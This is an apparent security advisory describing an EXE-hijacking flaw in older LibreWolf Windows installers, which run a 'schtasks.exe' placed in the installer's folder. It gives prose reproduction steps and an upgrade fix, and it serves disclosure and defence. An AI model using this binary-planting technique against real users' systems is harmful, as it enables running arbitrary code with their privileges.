LibreWolf Installer Uncontrolled Search Path Vulnerability Allowing EXE Hijacking

A vulnerability in the LibreWolf installer for Windows, specifically in versions prior to 144.0-1, has been identified. This issue arises from an uncontrolled search path in the installation process, allowing for EXE hijacking. When the installer is executed, it looks for a missing executable named 'schtasks.exe' in the same directory as the installer. If a malicious executable with that name is placed in the folder before installation, the LibreWolf installer will automatically execute it after the installation is complete. This vulnerability could be exploited to run arbitrary commands with the same privileges as the user who installed the browser, potentially compromising data or altering system functionality.

Impact

Exploitation of this vulnerability allows a malicious user to execute a harmful EXE file with the same rights as the user who installed LibreWolf. This could lead to unauthorized command execution, data compromise, or changes in system operations, undermining the overall security and integrity of the affected environment.

Reproduction

To reproduce this vulnerability, first uninstall any existing LibreWolf installation. Then, download the LibreWolf installer version 143.0.4-1 for Windows. Before running the installer, create a malicious executable named 'schtasks.exe' and place it in the same folder as the installer. Once the malicious EXE is in place, run the LibreWolf installer. After the installation finishes, the installer will automatically execute the 'schtasks.exe' file, thereby exploiting the vulnerability.

Remediation

Users are advised to upgrade to LibreWolf version 144.0-1, which addresses this vulnerability. The updated version can be downloaded from the LibreWolf GitHub releases page.